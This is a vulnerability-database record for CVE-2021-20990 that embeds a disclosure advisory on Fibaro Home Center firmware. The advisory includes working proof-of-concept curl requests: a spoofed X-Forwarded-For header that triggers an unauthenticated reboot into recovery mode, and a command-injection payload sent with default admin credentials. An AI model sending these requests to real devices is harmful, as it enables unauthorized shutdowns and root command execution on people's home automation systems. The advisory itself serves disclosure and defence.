      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202104-0468",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "home center lite",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "fibaro",
        "version": "4.600"
      },
      {
        "model": "home center 2",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "fibaro",
        "version": "4.600"
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-20990"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Marton Illes",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-1335"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2021-20990",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2021-20990",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 1.1,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2021-20990",
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 2.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2021-20990",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "info@cert.vde.com",
            "id": "CVE-2021-20990",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202104-1335",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2021-20990",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-20990"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-1335"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-20990"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-20990"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "In Fibaro Home Center 2 and Lite devices with firmware version 4.600 and older an internal management service is accessible on port 8000 and some API endpoints could be accessed without authentication to trigger a shutdown, a reboot or a reboot into recovery mode. IoT Inspector Research Lab Advisory IOT-20210408-0\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n             title: Multiple vulnerabilities \n\n    vendor/product: Fibaro Home Center Light / Fibaro Home Center 2\n\n                    https://www.fibaro.com/\n\nvulnerable version: 4.600 and older\n\n     fixed version: 4.610\n\n        CVE number: CVE-2021-20989, CVE-2021-20990, CVE-2021-20991, \n\n                    CVE-2021-20992\n\n            impact: 8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n                    9.8 (critical)\nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n                    7.2 (high) CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n                    8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n          reported: 2020-11-18\n\n       publication: 2021-04-08\n\n                by: Marton Illes, IoT Inspector Research Lab\n\n                    https://www.iot-inspector.com/\n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nVendor description:\n\n-------------------\n\n\"FIBARO is a global brand based on the Internet of Things technology. It \n\nprovides solutions for building and home automation. FIBARO\u0027s headquarters\n\nand factory are located in Wysogotowo, 3 miles away from Poznan. The company\n\nemploys app. 250 employees.\"\n\n \n\nhttps://www.fibaro.com/en/about-us/\n\n \n\n \n\nVulnerability overview/description:\n\n-----------------------------------\n\n1) Cloud SSH Connection Man-in-the-Middle Attack (CVE-2021-20989)\n\nHome Center devices initiate SSH connections to the Fibaro cloud to provide \n\nremote access and remote support capabilities. This connection can be \n\nintercepted using a man-in-the-middle attack and a device initiated remote \n\nport-forward channel can be used to connect to the web management interface. \n\n\nIoT Inspector identified a disabled SSH host key check, which enables \n\nman-in-the-middle attacks. \n\n \n\nBy initiating connections to the Fibaro cloud an attacker can eavesdrop on \n\ncommunication between the user and the device. As communication inside the \n\nSSH port-forward is not encrypted (see #4 on management interface), user \n\nsessions, tokens and passwords can be hijacked. In recovery mode, an attacker can \n\nupload firmware without authentication. (Potentially an earlier version with\n\n\nknown remote command execution vulnerability, see #3)\n\n \n\n3) Authenticated remote command execution (versions before 4.550) \n\n(CVE-2021-20991)\n\nAn authenticated user can run commands as root user using a command\ninjection \n\nvulnerability. \n\nSimilar problems were also discovered by Pavel Cheremushkin from Kaspersky \n\nICS Cert: https://securelist.com/fibaro-smart-home/91416/\n\n \n\n4) Unencrypted management interface (CVE-2021-20992)\n\nHome Center devices provide a web based management interface over\nunencrypted \n\nHTTP protocol. Communication between the user and the device can be \n\neavesdropped to hijack sessions, tokens, and passwords. The management \n\ninterface is only available over HTTP on the local network. The vendor \n\nrecommends using the cloud-based management interface, which is accessible\nover \n\nHTTPS and requests are forwarded via an encrypted SSH connection between the\n\n\nFibaro cloud and the device. \n\n \n\n \n\nProof of concept:\n\n-----------------\n\n1) Cloud SSH Connection Man-in-the-Middle Attack\n\n \n\nHome Center devices initiate a SSH connection to the Fibaro cloud\n\n \n\n \n\n./etc/init.d/fibaro/RemoteAccess\n\n \n\n\u003csnip\u003e\n\nDAEMON=/usr/bin/ssh\n\n \n\n.... \n\n \n\ncase \"$1\" in\n\n  start)\n\n    \n\n                ..... \n\n \n\n    # get IP\n\n    local\nGET_IP_URL=\"https://dom.fibaro.com/get_ssh_ip.php?PK_AccessPoint=${HC2_Seria\nl}\u0026HW_Key=${HW_Key}\"\n\n    local IP_Response; IP_Response=$(curl -f -s -S --retry 3\n--connect-timeout 100 --max-time 100 \"${GET_IP_URL}\" | tr -d \u0027\n!\"#$%\u0026|\u0027\"\u0027\"\u0027|()*+,/:;\u003c=\u003e?@[|\\\\|]|^`|\\||{}~\u0027)\n\n \n\n    # get PORT\n\n    local\nGET_PORT_URL=\"https://dom.fibaro.com/get_ssh_port.php?PK_AccessPoint=${HC2_S\nerial}\u0026HW_Key=${HW_Key}\"\n\n    local PORT_Response; PORT_Response=$(curl -f -s -S --retry 3\n--connect-timeout 100 --max-time 100 \"${GET_PORT_URL}\" | tr -d \u0027\n!\"#$%\u0026|\u0027\"\u0027\"\u0027|()*+,/:;\u003c=\u003e?@[|\\\\|]|^`|\\||{}~\u0027)\n\n \n\n                .... \n\n                \n\n    start-stop-daemon --start --background --pidfile \"${PIDFILE}\"\n--make-pidfile --startas /usr/bin/screen \\\n\n    -- -DmS ${NAME} ${DAEMON} -y -K 30 -i\n/etc/dropbear/dropbear_rsa_host_key -R \"${PORT_Response}\":localhost:80\nremote2@\"${IP_Response}\"\n\n\u003c/snip\u003e\n\n \n\nThe device uses dropbear ssh to initiate the connection; option -y disables\nany \n\nhost-key checks, voiding much of the otherwise added transport-layer\nsecurity \n\nby SSH: \"Always accept hostkeys if they are unknown.\"\n\n \n\nThe above \"get IP\" endpoint returns the address of the Fibaro cloud, e.g.: \n\nlb-1.eu.ra.fibaro.com\n\n \n\nAn attacker can use DNS spoofing or other means to intercept the connection. \nBy \n\nusing any hostkey, the attacker can successfully authenticate the SSH \n\nconnection. Once the connection is authenticated, the client initiates a\nremote \n\nport-forward:\n\n-R \"${PORT_Response}\":localhost:80\n\n \n\nThis enables the attacker to access port 80 (management interface) of the \n\ndevice. \n\n \n\nA similar problem exists for remote support connections:\n\n \n\n./opt/fibaro/scripts/remote-support.lua\n\n\u003csnip\u003e\n\nfunction handleResponse(response)\n\n  responseJson = json.decode(response.data)\n\n  print(json.encode(responseJson))\n\n \n\n  local autoSSHCommand = \u0027ssh -y -K 30 -i\n/etc/dropbear/dropbear_rsa_host_key -R \u0027  .. responseJson.private_ip..  \u0027:\u0027\n.. responseJson.port .. \u0027:localhost:22 remote2@\u0027 .. responseJson.ip\n\n  os.execute(autoSSHCommand)\n\nend\n\n \n\nfunction getSupportData()\n\n  remoteUrl=\u0027https://dom.fibaro.com/get_support_route.php?PK_AccessPoint=\u0027\n.. serialNumber .. \u0027\u0026HW_Key=\u0027 .. HWKey\n\n  print(remoteUrl)\n\n \n\n  http = net.HTTPClient({timeout = 5000})\n\n \n\n  http:request(remoteUrl, {\n\n    options = {\n\n      method = \u0027GET\u0027\n\n    },\n\n    success = function(response)\n\n      handleResponse(response)\n\n    end,\n\n    error = function(error)\n\n      print(error)\n\n    end\n\n  })\n\nend\n\n \n\ngetSupportData()\n\n\u003c/snip\u003e\n\n \n\nHere, the remote support endpoint returns the following data:\n\n{\"ip\":\"fwd-support.eu.ra.fibaro.com\",\"port\":\"XXXXX\",\"private_ip\":\"10.100.YYY\n.ZZZ\"}\n\n \n\nThe same dropbear ssh client is used with option -y. In this case, port 22 \n\n(ssh) is made accessible through the port-forward. However, the device only \n\nallows public key authentication with a hard-coded SSH key. No further\ntesting \n\nhas been done on compromising the support SSH connection. \n\n \n\n \n\n2) Unauthenticated access to shutdown, reboot and reboot to recovery mode\n\n \n\nThe device is running a nginx server, which forwards some requests to a \n\nlighttpd server (8000) for further processing:\n\n\u003csnip\u003e\n\n                                proxy_set_header X-Forwarded-For\n$proxy_add_x_forwarded_for;\n\n                                \n\n        location ~* \\.php$ {\n\n            proxy_pass   http://127.0.0.1:8000;\n\n        }\n\n \n\n        location ~* \\.php\\?.* {\n\n            proxy_pass   http://127.0.0.1:8000;\n\n        }\n\n\u003c/snip\u003e\n\n \n\nThe lighttpd server is not only accessible locally, but also via the local \n\nnetwork. \n\n \n\nAuthentication and authorization is implemented in PHP and there is a\nspecial \n\ncheck for connections originating from within the host. However, when\nchecking \n\nthe remote IP address, the header X-Forwarded-For is also considered:\n\n \n\n./var/www/authorize.php\n\n\u003csnip\u003e\n\nfunction isLocalRequest()\n\n{\n\n    $ipAddress = \"\";\n\n    if(!empty($_SERVER[\u0027HTTP_X_FORWARDED_FOR\u0027])) \n\n        $ipAddress = $_SERVER[\u0027HTTP_X_FORWARDED_FOR\u0027];\n\n    else\n\n        $ipAddress = $_SERVER[\u0027REMOTE_ADDR\u0027];\n\n \n\n    $whitelist = array( \u0027127.0.0.1\u0027, \u0027::1\u0027 );\n\n    if(in_array($ipAddress, $whitelist))\n\n        return true;\n\n \n\n    return false;\n\n}\n\n\u003c/snip\u003e\n\n \n\nAs the lighttpd service available via the network, an attacked can inject\nthe \n\nrequired header X-Forwarded-For as well. \n\n \n\nThe check isLocalRequest is used to \"secure\" multiple endpoints:\n\n \n\n./var/www/services/system/shutdown.php\n\n\u003csnip\u003e\n\n\u003c?php\n\n    require_once(\"../../authorize.php\");\n\n \n\n    if (!isLocalRequest() \u0026\u0026 !isAuthorized())\n\n    {\n\n       sendUnauthorized();\n\n    }\n\n    else\n\n    {\n\n        exec(\"systemShutdown\");\n\n    }\n\n?\u003e\n\n\u003c/snip\u003e\n\n \n\n./var/www/services/system/reboot.php\n\n\u003csnip\u003e\n\n \n\nfunction authorize() \n\n{\n\n    return isAuthorized() || isAuthorizedFibaroAuth(array(role::USER,\nrole::INSTALLER));\n\n}\n\n \n\nfunction handlePOST($text)\n\n{\n\n    if (!isLocalRequest() \u0026\u0026 !authorize())\n\n    {\n\n       sendUnauthorized();\n\n       return;\n\n    }\n\n \n\n    $params = tryDecodeJson($text);\n\n    if(!is_null($params) \u0026\u0026 isset($params-\u003erecovery) \u0026\u0026 $params-\u003erecovery\n=== true)\n\n        exec(\"rebootToRecovery\");\n\n    else\n\n        exec(\"systemReboot\");\n\n}\n\n \n\n$requestBody = file_get_contents(\u0027php://input\u0027);\n\n$requestMethod = $_SERVER[\u0027REQUEST_METHOD\u0027];\n\n \n\nif ($requestMethod == \"POST\") \n\n    handlePOST($requestBody);\n\nelse \n\n    setStatusMethodNotAllowed();\n\n \n\n\u003c/snip\u003e\n\n \n\nAn attacker can issue the the following HTTP request to reboot the device\ninto \n\nrecovery mode:\n\ncurl -H \u0027X-Forwarded-For: 127.0.0.1\u0027 -H \u0027Content-Type: application/json\u0027 -d\n\u0027{\"recovery\":true}\u0027  http://DEVICE:8000/services/system/reboot.php\n\n \n\nIn recovery mode, firmware images can be updated without authentication. \n\n \n\n \n\n3) Authenticated remote command execution (versions before 4.550)\n\n \n\nBackup \u0026 restore operations could be triggered though HTTP endpoints:\n\n \n\n./var/www/services/system/backups.php\n\n\u003csnip\u003e\n\nfunction restoreBackup($params)\n\n{\n\n    if (getNumberOfInstances(\u0027{screen} SCREEN -dmS RESTORE\u0027) \u003e 0)\n\n    {\n\n        setStatusTooManyRequests();\n\n        return;\n\n    }\n\n \n\n    $type = $params-\u003etype;\n\n    $id = $params-\u003eid;\n\n    $version = $params-\u003eversion;\n\n \n\n    if (is_null($id) || !is_numeric($id) || $id \u003c 1 ) \n\n    {\n\n        setStatusBadRequest();\n\n        return;\n\n    }\n\n \n\n    $hcVersion = exec(\"cat /mnt/hw_data/serial | cut -c1-3\");\n\n \n\n    if ($type == \"local\" \u0026\u0026 $hcVersion == \"HC2\" || $type == \"remote\") \n\n    {\n\n        $version ?\n\n                exec(\u0027screen -dmS RESTORE restoreBackup.sh --\u0027 . $type. \u0027 \u0027. \n$id . \u0027 \u0027 . $version) :\n\n                exec(\u0027screen -dmS RESTORE restoreBackup.sh --\u0027 . $type. \u0027 \u0027. \n$id);\n\n    }\n\n    else \n\n    {\n\n        setStatusBadRequest();\n\n        return;\n\n    }\n\n \n\n    setStatusAccepted();\n\n}\n\n\u003c/snip\u003e\n\n \n\nThe parameter $version is not sanitized or escaped, which allows an attacker\nto \n\ninject shell commands into the exec() call:\n\n \n\ncat \u003e /tmp/exploit \u003c\u003c- EOM\n\n{\"action\": \"restore\", \"params\": {\"type\": \"remote\", \"id\": 1, \"version\": \"1;\nINJECTED COMMAND\"}}\n\nEOM\n\n \n\ncurl -H \u0027Authorization: Basic YWRtaW46YWRtaW4=\u0027 -H \u0027content-type:\napplication/json\u0027 -d@/tmp/exploit  http://DEVICE/services/system/backups.php\n\n\n \n\nVersion 4.550 and later have proper escaping:\n\n\u003csnip\u003e\n\n    $version = escapeshellarg($params-\u003eversion);\n\n\u003c/snip\u003e\n\n \n\n \n\n4) Unencrypted management interface\n\n \n\nNMMAP shows a few open ports on the box:\n\nPORT     STATE SERVICE\n\n22/tcp   open  ssh\n\n80/tcp   open  http\n\n8000/tcp open  http-alt\n\n \n\nBoth 80/tcp and 8000/tcp can be accessed over unencrypted HTTP. \n\n \n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nVulnerable / tested versions:\n\n-----------------------------\n\nVulnerabilities 1, 2, 4 were confirmed on 4.600, which was the latest\nversion \n\nat the time of the discovery\n\nVulnerabilities 1, 2, 3, 4 were confirmed on 4.540, 4.530\n\n \n\nSolution:\n\n---------\n\nUpgrade to the version 4.610 or latest version, which fixes vulnerabilities\n1, \n\n2 and 3. \n\n \n\nVulnerability 4 is not fixed as the vendor assumes that the local network is\n\n\ntrusted and the device only provides wired network access. Furthermore, the \n\nvendor recommends using the cloud-based management interface, which is \n\naccessible over HTTPS and requests are forwarded via an encrypted SSH \n\nconnection between the Fibaro cloud and the device. \n\n \n\n \n\nAdvisory URL:\n\n-------------\n\nhttps://www.iot-inspector.com/blog/advisory-fibaro-home-center/\n\n \n\n \n\nVendor contact timeline:\n\n------------------------\n\n2020-11-18: Contacting Fibaro through support@fibaro.com, \n\n            support-usa@fibaro.com, info@fibaro.com, recepcja@fibargroup.com\n\n2020-11-23: Contacting Fibaro on Facebook \u0026 LinkedIn, got response on\nLinkedIn\n\n2020-11-24: Adivsory sent to Fibaro by email\n\n2020-12-01: Fibaro confirmed the receipt of the advisory\n\n2021-02-02: Meeting with Fibaro to discuss the vulnerabilities and fixes\n\n2021-03-16: Fibaro beta release (4.601) with the fixes\n\n2021-03-24: Fibaro applies for CVE numbers\n\n2021-03-31: Fibaro GA release (4.610) with the fix\n\n2021-04-08: IoT Inspector Research Lab publishes advisory\n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nThe IoT Inspector Research Lab is an integrated part of IoT Inspector. \n\n \n\nIoT Inspector is a platform for automated security analysis and compliance \n\nchecks of IoT firmware. Our mission is to secure the Internet of Things. In \n\norder to discover vulnerabilities and vulnerability patterns within IoT\ndevices\n\nand to further enhance automated identification that allows for scalable \n\ndetection within IoT Inspector, we conduct excessive security research in\nthe\n\narea of IoT. \n\n \n\nWhenever the IoT Inspector Research Lab discovers vulnerabilities in IoT \n\nfirmware, we aim to responsibly disclose relevant information to the vendor\n\nof the affected IoT device as well as the general public in a way that \n\nminimizes potential harm and encourages further security analyses of IoT \n\nsystems. \n\n \n\nYou can find our responsible disclosure policy here:\n\nhttps://www.iot-inspector.com/responsible-disclosure-policy/\n\n \n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nInterested in using IoT Inspector for your research or product?\n\n \n\nMail: research at iot-inspector dot com\n\nWeb: https://www.iot-inspector.com\n\nBlog: https://www.iot-inspector.com/blog/\n\nTwitter: https://twitter.com/iotinspector\n\n \n\nEOF Marton Illes / @2021\n\n \n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-20990"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-20990"
      },
      {
        "db": "PACKETSTORM",
        "id": "162243"
      }
    ],
    "trust": 1.08
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "PACKETSTORM",
        "id": "162243",
        "trust": 1.8
      },
      {
        "db": "NVD",
        "id": "CVE-2021-20990",
        "trust": 1.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-1335",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-20990",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-20990"
      },
      {
        "db": "PACKETSTORM",
        "id": "162243"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-1335"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-20990"
      }
    ]
  },
  "id": "VAR-202104-0468",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.5
  },
  "last_update_date": "2024-11-23T22:05:09.380000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Fibaro Home Center 2 Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=147746"
      }
    ],
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-1335"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-306",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-20990"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.8,
        "url": "https://www.iot-inspector.com/blog/advisory-fibaro-home-center/"
      },
      {
        "trust": 1.8,
        "url": "http://seclists.org/fulldisclosure/2021/apr/27"
      },
      {
        "trust": 1.7,
        "url": "http://packetstormsecurity.com/files/162243/fibaro-home-center-mitm-missing-authentication-code-execution.html"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20990"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/863.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://dom.fibaro.com/get_ssh_ip.php?pk_accesspoint=${hc2_seria"
      },
      {
        "trust": 0.1,
        "url": "https://www.iot-inspector.com"
      },
      {
        "trust": 0.1,
        "url": "https://securelist.com/fibaro-smart-home/91416/"
      },
      {
        "trust": 0.1,
        "url": "https://www.iot-inspector.com/responsible-disclosure-policy/"
      },
      {
        "trust": 0.1,
        "url": "https://www.iot-inspector.com/"
      },
      {
        "trust": 0.1,
        "url": "https://www.iot-inspector.com/blog/"
      },
      {
        "trust": 0.1,
        "url": "http://device:8000/services/system/reboot.php"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20991"
      },
      {
        "trust": 0.1,
        "url": "http://127.0.0.1:8000;"
      },
      {
        "trust": 0.1,
        "url": "https://twitter.com/iotinspector"
      },
      {
        "trust": 0.1,
        "url": "https://dom.fibaro.com/get_support_route.php?pk_accesspoint=\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://device/services/system/backups.php"
      },
      {
        "trust": 0.1,
        "url": "https://dom.fibaro.com/get_ssh_port.php?pk_accesspoint=${hc2_s"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20989"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20992"
      },
      {
        "trust": 0.1,
        "url": "https://www.fibaro.com/en/about-us/"
      },
      {
        "trust": 0.1,
        "url": "https://www.fibaro.com/"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-20990"
      },
      {
        "db": "PACKETSTORM",
        "id": "162243"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-1335"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-20990"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2021-20990"
      },
      {
        "db": "PACKETSTORM",
        "id": "162243"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-1335"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-20990"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-04-19T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-20990"
      },
      {
        "date": "2021-04-20T16:14:10",
        "db": "PACKETSTORM",
        "id": "162243"
      },
      {
        "date": "2021-04-19T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202104-1335"
      },
      {
        "date": "2021-04-19T14:15:11.710000",
        "db": "NVD",
        "id": "CVE-2021-20990"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-04-23T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-20990"
      },
      {
        "date": "2022-08-10T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202104-1335"
      },
      {
        "date": "2024-11-21T05:47:20.700000",
        "db": "NVD",
        "id": "CVE-2021-20990"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "162243"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-1335"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "FIBARO Home Center 2 Access control error vulnerability",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-1335"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "access control error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-1335"
      }
    ],
    "trust": 0.6
  }
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2021-20990 (GCVE-0-2021-20990)

GSD-2021-20990

FKIE_CVE-2021-20990

GHSA-V9VJ-VPG8-VQMJ

VAR-202104-0468

Tags

Sightings

Nomenclature